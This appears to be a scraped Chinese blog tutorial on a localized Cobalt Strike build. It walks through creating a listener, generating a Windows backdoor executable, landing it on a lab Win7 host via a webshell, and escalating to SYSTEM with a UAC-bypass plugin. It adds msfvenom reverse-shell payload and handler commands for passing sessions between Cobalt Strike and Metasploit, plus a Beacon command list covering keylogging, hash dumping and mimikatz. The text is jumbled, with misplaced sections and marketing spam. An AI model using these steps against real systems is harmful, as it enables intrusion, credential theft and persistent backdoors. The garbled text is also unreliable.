Advertisement

2024年网络安全最新Cobalt Strike汉化版——安装与使用教程_kali安装cobaltstrike4,网络安全开发真等于废人

阅读量:

写在最后

在总结的时候

需要完整版PDF学习资源私我

丰富的网络学习资源可得之又 plenty, 但若所学知识未能形成系统化体系, 在遇到问题时往往停留在表面理解, 缺乏深入的研究精神, 就难以真正实现技术上的提升。

希望获得系统化资料的用户,请访问此链接:

一个人走得再快也不过是独木桥,而一群人走则能走出一片新的天地!无论你是正在从事IT行业的资深从业者还是对IT领域充满热情的新手,都欢迎加入我们的这个圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起携手共创辉煌吧!

如下图所示

在这里插入图片描述

之后点击添加

在这里插入图片描述
在这里插入图片描述

出现下图弹窗则说明监听器设置成功,并且正在监听

在这里插入图片描述

2、生成木马
按下图所示生成Windows Executable后门木马

在这里插入图片描述

选择已生成好的监听器

在这里插入图片描述

勾选X64:目标系统是64位的话需要勾选

在这里插入图片描述

将生成的木马保存在电脑中

在这里插入图片描述

保存成功后会有如下提示

在这里插入图片描述

3、执行木马、反弹会话

在实验中完成WebShell的植入,并通过该程序发送了后门木马artifact.exe。将靶机设置为IP地址win7(IP地址为)192.168.184.141。通过蚁剑工具实现了对WebShell的连接。

在这里插入图片描述
在这里插入图片描述

执行artifact.exe后门文件,目标靶机成功上线

在这里插入图片描述

点击查看视图的图标,可以看到上线主机的信息为普通用户:zhxxxx

在这里插入图片描述

4、提升权限(Power)

在这里插入图片描述
在这里插入图片描述

测试执行命令:getuid,稍等一会儿后会显示执行结果

在这里插入图片描述

接下来右键选择提权,如下图所示

在这里插入图片描述

默认提权的exp就下面这两个,肯定不够,所以得去加载一些提权的插件

常见的用于获取内容的工具包位置:
https://github.com/Dостейevost/Erebus
https://github.com/rsmudge/ElevateKit

在这里插入图片描述

安装任意一个增强功能包并进行保存操作,请注意以下链接即为本例中所使用的增强包来源地址:https://github.com/rsmudge/ElevateKit

在这里插入图片描述

如何加载插件?
如下图所示,选择脚本管理器后,会在下面弹窗提示path

在这里插入图片描述

之后选择 插件 并点击打开

在这里插入图片描述

之后点击 Unload 上传插件

在这里插入图片描述

之后再查看提权的EXP,发现增加了很多

在这里插入图片描述

接下来利用 uac-schtasks 的 exp进行提权

在这里插入图片描述

点击启动后, 可以通过命令得知正在进行攻击测试, 如果攻击成功, 会将权限配置为 SYSTEM 类型, 如下图所示, 即实现权限提升

在这里插入图片描述

4.2 Cobalt Strike ——CS与MSF相互联动传递(Empire)

复制代码
    #CS->MSF
    cs: spawn XXx
    windows/foreign/reverse_http
    MSF:
    windows/meterpreter/reverse_http
    
    #MSF->CS
    MSF:
    use exploit/windows/local/payload_inject
    windows/meterpreter/reverse_http
    CS:
    windows/beacon_http/reverse_http

CS- >MSF示例
前提: CS控制了靶机

首先启动kali的msf

复制代码
    msfconsole
在这里插入图片描述

随后安装一下payload配置和相关选项。通过kali实现网络捕获功能。详细步骤可参考下述流程图,在实际操作中,请确保所有参数已正确配置。

复制代码
    use exploit/multi/handler
    set payload windows/meterpreter/reverse_http
    set lhost 192.168.184.145 //kali的地址
    set lport 1234 
    exploit
在这里插入图片描述

接下来需要去CS中新建一个监听器

在这里插入图片描述

监听器创建成功后会如下图所示

在这里插入图片描述

接下来选择需要转移的会话,比如是SYSTEM权限的会话
进入命令行模式

在这里插入图片描述

执行命令:

复制代码
    spawn msf
在这里插入图片描述

稍等2分钟后,msf能接收到转移来的会话,如下图所示

在这里插入图片描述

MSF- >CS示例

前提: MSF控制了靶机

MSF生成后门 ceshi.exe,并且将后门 ceshi.exe 放在靶机win7上

复制代码
    msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.184.145 lport=2222 -f exe -o ceshi.exe
在这里插入图片描述

msf打开监听

复制代码
    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set lhost 192.168.184.145 //kali的地址
    set lport 2222
    exploit
在这里插入图片描述

此时在靶机win7上执行一下ceshi.exe

在这里插入图片描述

msf成功监听到会话

在这里插入图片描述

接下来需要转移会话了
打开cs,创建监听器名字为msf

在这里插入图片描述

创建成功后如下图所示

在这里插入图片描述

接下来将MSF的会话转移到CS

复制代码
    background
    use exploit/windows/local/payload_inject
    set payload windows/meterpreter/reverse_http
    set lhost 192.168.184.145 
    set lport 6666  
    set session 1
    exploit

数万命令如下图显示,则说明成功转移会话

在这里插入图片描述
在这里插入图片描述

接下来查看cs客户端,发现新上线了一台msf监听器监听道德会话

在这里插入图片描述

指令大全:

复制代码
    BeaconCommands
    ===============
    Command                   Description
    -------                   -----------
    browserpivot              注入受害者浏览器进程
    bypassuac                 绕过UAC
    cancel                    取消正在进行的下载
    cd                        切换目录
    checkin                   强制让被控端回连一次
    clear                     清除beacon内部的任务队列
    connect                   Connect to a Beacon peerover TCP
    covertvpn                 部署Covert VPN客户端
    cp                        复制文件
    dcsync                    从DC中提取密码哈希
    desktop                   远程VNC
    dllinject                 反射DLL注入进程
    dllload                   使用LoadLibrary将DLL加载到进程中
    download                  下载文件
    downloads                 列出正在进行的文件下载
    drives                    列出目标盘符
    elevate                   尝试提权
       execute                   在目标上执行程序(无输出)
    execute-assembly          在目标上内存中执行本地.NET程序
    exit                      退出beacon
    getprivs                  Enable system privileges oncurrent token
    getsystem                 尝试获取SYSTEM权限
    getuid                    获取用户ID
    hashdump                  转储密码哈希值
    help                      帮助
    inject                    在特定进程中生成会话
    jobkill                   杀死一个后台任务
    jobs                      列出后台任务
    kerberos_ccache_use       从ccache文件中导入票据应用于此会话
    kerberos_ticket_purge     清除当前会话的票据
    kerberos_ticket_use       从ticket文件中导入票据应用于此会话
    keylogger                 键盘记录
    kill                      结束进程
    link                      Connect to a Beacon peerover a named pipe
    logonpasswords            使用mimikatz转储凭据和哈希值
    ls                        列出文件
    make_token                创建令牌以传递凭据
    mimikatz                  运行mimikatz
    mkdir                     创建一个目录
    mode dns                  使用DNS A作为通信通道(仅限DNS beacon)
    mode dns-txt              使用DNS TXT作为通信通道(仅限D beacon)
    mode dns6                 使用DNS AAAA作为通信通道(仅限DNS beacon)
    mode http                 使用HTTP作为通信通道
    mv                        移动文件
    net                       net命令
    note                      备注      
    portscan                  进行端口扫描
    powerpick                 通过Unmanaged PowerShell执行命令
    powershell                通过powershell.exe执行命令
    powershell-import         导入powershell脚本
    ppid                      Set parent PID forspawned post-ex jobs
    ps                        显示进程列表
    psexec                    Use a service to spawn asession on a host
    psexec_psh                Use PowerShell to spawn asession on a host
    psinject                  在特定进程中执行PowerShell命令
    pth                       使用Mimikatz进行传递哈希
    pwd                       当前目录位置
    reg                       Query the registry
    rev2self                  恢复原始令牌
    rm                        删除文件或文件夹
    rportfwd                  端口转发
    run                       在目标上执行程序(返回输出)
    runas                     以另一个用户权限执行程序
    runasadmin                在高权限下执行程序
    runu                      Execute a program underanother PID
    screenshot                屏幕截图
    setenv                    设置环境变量
    shell                     cmd执行命令
    shinject                  将shellcode注入进程
    shspawn                   生成进程并将shellcode注入其中
    sleep                     设置睡眠延迟时间
    socks                     启动SOCKS4代理
    socks stop                停止SOCKS4
    spawn                     Spawn a session
    spawnas                   Spawn a session as anotheruser
    spawnto                  Set executable tospawn processes into
    spawnu                    Spawn a session underanother PID
    ssh                       使用ssh连接远程主机
    ssh-key                   使用密钥连接远程主机
    steal_token               从进程中窃取令牌
    timestomp                 将一个文件时间戳应用到另一个文件
    unlink                    Disconnect from parentBeacon
    
    
    
    还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!
    
    
    王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。
    
    
    对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!
    
    
    【完整版领取方式在文末!!】
    
    
    ***93道网络安全面试题***
![]()
![]()
![]()
    
    
    
    
    
    内容实在太多,不一一截图了
    
    
    ### 黑客学习资源推荐
    
    
    最后给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!
    
    
    对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
    
    #### 1️⃣零基础入门
    
    
    ##### ① 学习路线
    
    
    对于从来没有接触过网络安全的同学,我们帮你准备了详细的**学习成长路线图**。可以说是**最科学最系统的学习路线**,大家跟着这个大的方向学习准没问题。
![image]()
    
    
    ##### ② 路线对应学习视频
    
    
    同时每个成长路线对应的板块都有配套的视频提供:
![image-20231025112050764]()
    
    **网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。** **[需要这份系统化资料的朋友,可以点击这里获取]()** **一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**

全部评论 (0)

还没有任何评论哟~